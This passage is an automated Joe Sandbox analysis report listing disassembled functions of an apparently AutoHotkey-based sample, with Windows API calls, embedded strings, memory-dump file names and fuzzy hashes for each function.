Opcode Fuzzy Hash: 05981d1e0442288bffe7f58dae3bcd8f96468017518f74f824c8412e889f8e6f
Instruction Fuzzy Hash: B33157719083842BE7329624DC057DFBBC84B95709F14891EFBC44B282E678668C879B

Function 00443D20 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 92COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00443DD2

Strings

UTF-8, xrefs: 00443D89
UTF-16-RAW, xrefs: 00443E22
UTF-16, xrefs: 00443D4B
UTF-8-RAW, xrefs: 00443DF5

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __itow
String ID: UTF-16$UTF-16-RAW$UTF-8$UTF-8-RAW
API String ID: 3482036329-2787617770
Opcode ID: 2e47373e833940f7630db69524ccc3b5ee7574e5d8766008179630a3fb750baa
Instruction ID: fcad2394826c7e0f049be06d4a2c777cd6c550d6576cfcf8e7742d670e49e39c
Opcode Fuzzy Hash: 2e47373e833940f7630db69524ccc3b5ee7574e5d8766008179630a3fb750baa
Instruction Fuzzy Hash: 1C31A9B4A042018FE714DF29D845A56B7E0AFA9B01F4984BAE848CB361E738DD04C79A

Function 00416610 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 68COMMON

Download Yara Rule

Strings

UTF-8, xrefs: 00416624
UTF-16-RAW, xrefs: 0041666F
UTF-16, xrefs: 00416656
UTF-8-RAW, xrefs: 0041663D

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: UTF-16$UTF-16-RAW$UTF-8$UTF-8-RAW
API String ID: 0-2787617770
Opcode ID: f2d6ae1c4a5df7d5c48aa271961c36a7a3c6f2a040fec996752bb61133643647
Instruction ID: 1b2e3c7cbfb9e3d1f2134223df362a3c9f84b18cb021b182720799cc51665a4e
Opcode Fuzzy Hash: f2d6ae1c4a5df7d5c48aa271961c36a7a3c6f2a040fec996752bb61133643647
Instruction Fuzzy Hash: 960152A2A4562166EE21302E3D13BEB154C0B61729F57447BFC04D5385F65CCDC241EE

Function 004577E0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 63COMMON

Download Yara Rule

Strings

ComObjRef, xrefs: 00457802
ComObj, xrefs: 00457895
ComObject, xrefs: 0045788E
ComObjArray, xrefs: 004577F1

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: ComObj$ComObjArray$ComObjRef$ComObject
API String ID: 0-4247866589
Opcode ID: 20daf598a69b3d58fde292604fc36cd0e52c81b55487af2690f0a327fdcd8935
Instruction ID: f26b7be25ce2b0ce3774e4e6cf73ed42eeaa9f6915a94c0b47e47ec883c5d3f1
Opcode Fuzzy Hash: 20daf598a69b3d58fde292604fc36cd0e52c81b55487af2690f0a327fdcd8935
Instruction Fuzzy Hash: 3F11C4246082115BE310FB1DAC45B6B33989F40715F844A7EF964DA2D3F66CD948C2AE

Function 004CB334 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 004CB34E

Part of subcall function 004C7C01: __amsg_exit.LIBCMT ref: 004C7C11

__getptd.LIBCMT ref: 004CB35F
__getptd.LIBCMT ref: 004CB36D

Strings

MOC, xrefs: 004CB340
csm, xrefs: 004CB347

Memory Dump Source

Source File: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __getptd$__amsg_exit
String ID: MOC$csm
API String ID: 1969926928-1389381023
Opcode ID: 33b9cced6b741998e27e7e2c03043b0455c789580758d048f674bb0431158d77
Instruction ID: 1bb7755aae445a5035abeda07fced7fb3f5ea6f182579bfa1cdb8479ea8da2bd
Opcode Fuzzy Hash: 33b9cced6b741998e27e7e2c03043b0455c789580758d048f674bb0431158d77
Instruction Fuzzy Hash: 1CE04F39104144CFC790AB69C146F297394EB48318F1A05AFE88DC7323DB3DD840A9CA

Function 00497FB0 Relevance: 7.8, APIs: 5, Instructions: 263COMMON

Download Yara Rule

APIs

_ValidateScopeTableHandlers.LIBCMT ref: 004980B1
__FindPESection.LIBCMT ref: 004980CB

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FindHandlersScopeSectionTableValidate
String ID:
API String ID: 876702719-0
Opcode ID: bb0ada269d91046ab4f6ed898520967e8a498ec6730a28640d130851cf7e72f3
Instruction ID: 70a4ebb453e83d35725dceff67f9d506381920943c87884b3813f7b27abc0722
Opcode Fuzzy Hash: bb0ada269d91046ab4f6ed898520967e8a498ec6730a28640d130851cf7e72f3
Instruction Fuzzy Hash: 1791D232A006159BCF14CB5CD841B6FBBA6FB86315F15427ED805A73A0DB39EC02CB98

Function 004CCD06 Relevance: 7.7, APIs: 5, Instructions: 162COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,00000000,?,00000000,00000000,?,004CCEF0,00000001,00000000,?), ref: 004CCDAC
_malloc.LIBCMT ref: 004CCDE1

Part of subcall function 004C836F: __FF_MSGBANNER.LIBCMT ref: 004C8392
Part of subcall function 004C836F: __NMSG_WRITE.LIBCMT ref: 004C8399
Part of subcall function 004C836F: RtlAllocateHeap.NTDLL(00000000,004C54D0), ref: 004C83E6

_memset.LIBCMT ref: 004CCE01
MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000000,00000000,00000000,?,?,?,00000000,00000001,?), ref: 004CCE16

Memory Dump Source

Source File: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeap_malloc_memset
String ID:
API String ID: 961435503-0
Opcode ID: 4adae4ccf6fa64c5faf8f902dc477812de706a00f036b66904c00b1114455f78
Instruction ID: 4895b9b87484a797ee0d80c3baa41d91515c9ad83098edd58d4191ac868d942f
Opcode Fuzzy Hash: 4adae4ccf6fa64c5faf8f902dc477812de706a00f036b66904c00b1114455f78
Instruction Fuzzy Hash: D651ADBA50010AAFCF50AF69CCC1EAF3BA9EB09754B14042FF90997210D738DD61DB99

Function 00469C60 Relevance: 7.6, APIs: 5, Instructions: 149windowstringCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000100D,000000FF,?), ref: 00469CC9
SendMessageA.USER32(?,00001005,00000000,?), ref: 00469CE6
SendMessageA.USER32(?,0000100D,000000FF,?), ref: 00469D26
SendMessageA.USER32(?,00001005,00000000,?), ref: 00469D47
lstrcmpiA.KERNEL32(?,?), ref: 00469D7F

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$lstrcmpi
String ID:
API String ID: 2977491028-0
Opcode ID: 7347e5434d925ac45fe154aa2ca94d8c6707c6824e3907fda2b4f1d0d97baa64
Instruction ID: 9662328c9d8a6f299920bc18fc7288cda9a365ed5f836155e69a8a0c159edbdf
Opcode Fuzzy Hash: 7347e5434d925ac45fe154aa2ca94d8c6707c6824e3907fda2b4f1d0d97baa64
Instruction Fuzzy Hash: B55171B0504B45AFD720DF25C840F67BBECEB45314F104A1EE59647681E3B8EC4A8BA6

Function 004362D0 Relevance: 7.6, APIs: 5, Instructions: 134COMMON

Download Yara Rule

APIs

__wcstoi64.LIBCMT ref: 00436327

Part of subcall function 00489975: strtoxl.LIBCMT ref: 00489996

__wcstoi64.LIBCMT ref: 00436362
GetWindowRect.USER32(00000000,?), ref: 004363A8
GetWindowRect.USER32(00000000,?), ref: 004363DA
GetParent.USER32(00000000), ref: 00436405

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: RectWindow__wcstoi64$Parentstrtoxl
String ID:
API String ID: 2994346273-0
Opcode ID: a76905bde45bb0214b1f6d756348484dec4674a77070e86ea32467f2747c5d71
Instruction ID: 2b5722fcc4c80dbc6f41ac13a6d562114957e5d565ac91a45fff2552331a3f0a
Opcode Fuzzy Hash: a76905bde45bb0214b1f6d756348484dec4674a77070e86ea32467f2747c5d71
Instruction Fuzzy Hash: E341EC71608312ABD710EF258881B6FB7E4AB89710F18482EF94486282D769D944C7AF

Function 004543FD Relevance: 7.6, APIs: 5, Instructions: 110COMMON

Download Yara Rule

APIs

__wcstoi64.LIBCMT ref: 00454423

Part of subcall function 00489F2E: strtoxq.LIBCMT ref: 00489F4F

__wsplitpath.LIBCMT ref: 00454485
CloseHandle.KERNEL32(?,?,?,?), ref: 004544F1
CloseHandle.KERNEL32(?,?,?,?), ref: 00454504
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 0045451B

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseHandle$__wcstoi64__wsplitpathstrtoxq
String ID:
API String ID: 65225943-0
Opcode ID: 9629fb64385b8ea439d6fac65773c5807ce1e4199bab507107536f0721575a2b
Instruction ID: 4df950ab4c4c890903a79774350b239968a2a1fb5cec3aa02597389afa691008
Opcode Fuzzy Hash: 9629fb64385b8ea439d6fac65773c5807ce1e4199bab507107536f0721575a2b
Instruction Fuzzy Hash: BB3106722043056BD720E7649C01BFF73999BC530AF44487EFE458B282FA39D94C879A

Function 0045D81D Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000130B,00000000,00000000), ref: 0045D879
GetWindowLongA.USER32(00000000,000000F0), ref: 0045D889
SendMessageA.USER32(?,00001330,-00000001,00000000), ref: 0045D8A2
SendMessageA.USER32(?,0000130B,00000000,00000000), ref: 0045D8B1

Part of subcall function 00468FF0: SendMessageA.USER32(?,00001304,00000000,00000000), ref: 00469007

SendMessageA.USER32(00000000,0000130C,-00000001,00000000), ref: 0045D8DD

Part of subcall function 00468C50: SendMessageA.USER32(?,0000130B,00000000,00000000), ref: 00468C6D
Part of subcall function 00468C50: GetWindowLongA.USER32(?,000000F0), ref: 00468C79

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: f329b24aff5fd2a1eea3429eb4915321ea8b8540f16c2f634cdc5ddc74978034
Instruction ID: e0ccc57e0aa572b22c0ed6ff7e02410d4c8786d176263dcc1a32f29cc955c227
Opcode Fuzzy Hash: f329b24aff5fd2a1eea3429eb4915321ea8b8540f16c2f634cdc5ddc74978034
Instruction Fuzzy Hash: 1431D635A44304ABE730AB658C81B6B7364AF44711F14492EFE256B2C2D378EC098B9D

Function 0040927F Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 97COMMON

Download Yara Rule

Strings

AHK Keybd, xrefs: 0040930C
AHK Mouse, xrefs: 0040939B
Warning: The keyboard and/or mouse hook could not be activated; some parts of the script will not function., xrefs: 004093E9

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: AHK Keybd$AHK Mouse$Warning: The keyboard and/or mouse hook could not be activated; some parts of the script will not function.
API String ID: 0-3816831916
Opcode ID: b57bedc0d1751b4b7ac56d298e612fe4b6d6abed9c4a9caf89534be1f126a979
Instruction ID: 81d8d75a4108d19388d6b8884e76f202e204639147ad8a6a6de76193e0c53c1e
Opcode Fuzzy Hash: b57bedc0d1751b4b7ac56d298e612fe4b6d6abed9c4a9caf89534be1f126a979
Instruction Fuzzy Hash: CF31F670508345A9EB21AB259C49B6B7F905B46308F14487FFD81662D3C2BC8D88CF5E

Function 00413B7F Relevance: 7.6, APIs: 5, Instructions: 92COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00413BA2
ToAsciiEx.USER32(0000006E,00000000,?,?,00000000), ref: 00413BC3
ToAsciiEx.USER32(?,00000000,?,?,00000000), ref: 00413BE6
ToAsciiEx.USER32(0000006E,00000000,?,?,00000000), ref: 00413C01
ToAsciiEx.USER32(00000000,00000000,?,?,00000000), ref: 00413C3E

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Ascii$_memset
String ID:
API String ID: 3049224079-0
Opcode ID: e51d4acb32d94afadc2b74dc0ce445b75c53411c9badae23d09b0e58309c4c78
Instruction ID: bdacc0d3f1ae21851d75988e21f441a8a43246912a74ecb6cd9f92d19cc9e13a
Opcode Fuzzy Hash: e51d4acb32d94afadc2b74dc0ce445b75c53411c9badae23d09b0e58309c4c78
Instruction Fuzzy Hash: AA2105762883553AD220CB60DC52FEB7BDC9F85B45F44080EF2C45A0D1E6A9D788C7E9

Function 0043C146 Relevance: 7.6, APIs: 5, Instructions: 86COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0043C15E
SetWindowPos.USER32(?,00000000,00000000,00000000,00000058,?,0000000E,?,?,?,?,00000000), ref: 0043C17E
GetWindowRect.USER32(?,?), ref: 0043C18A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000058,?,0000000E,?,00000000,00000000,00000000,00000058,?,0000000E,?,?), ref: 0043C1A8
GetWindowRect.USER32(?,?), ref: 0043C1B0

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Window$Rect
String ID:
API String ID: 3200805268-0
Opcode ID: ac5a83a30dee668438a6c3ff18343715ec78805b98e854b012539861162704ce
Instruction ID: fadbe9a033e46645dff7927398543407464a04117f71f2bdf88820fe5941668d
Opcode Fuzzy Hash: ac5a83a30dee668438a6c3ff18343715ec78805b98e854b012539861162704ce
Instruction Fuzzy Hash: 69317F71644304AFE214DB64CD85F3F77EAABD8704F60590DF58AA7290C678EC45CB2A

Function 00468930 Relevance: 7.6, APIs: 5, Instructions: 68windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0046894C
SendMessageA.USER32(?,0000102F,00000000,00000000), ref: 00468960
SendMessageA.USER32(?,00001024,00000000,?), ref: 0046898F
SendMessageA.USER32(?,00001026,00000000,?), ref: 004689B6
SendMessageA.USER32(?,00001001,00000000,?), ref: 004689C3

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4ff81ceb3b5626652035785e898af49d937a866f35eabd545b230d85599fd945
Instruction ID: 53d929ce0d75bd258b54c0c3be9a385eca21f569fb3766904cb34aac534d4e31
Opcode Fuzzy Hash: 4ff81ceb3b5626652035785e898af49d937a866f35eabd545b230d85599fd945
Instruction Fuzzy Hash: CB114CB07407016BE630DA658CC5FB7B398AF48B10F14461EB9A5A73C1E7B4EC85CA59

Function 0044CBEC Relevance: 7.6, APIs: 5, Instructions: 66windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00000000,00000060,00000060), ref: 0044CC1C
SendMessageA.USER32(?), ref: 0044CC4A
SendMessageA.USER32(00000000,00000414,00000001,00000000), ref: 0044CC63
DestroyCursor.USER32(00000000), ref: 0044CC6A
SendMessageA.USER32(?,00000404,00000001,?), ref: 0044CC87

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$CursorDestroy
String ID:
API String ID: 1839592766-0
Opcode ID: a9a610ff3a829c3e9c3a1f4c84149d572bab5df43195f70e3817d45e3e420289
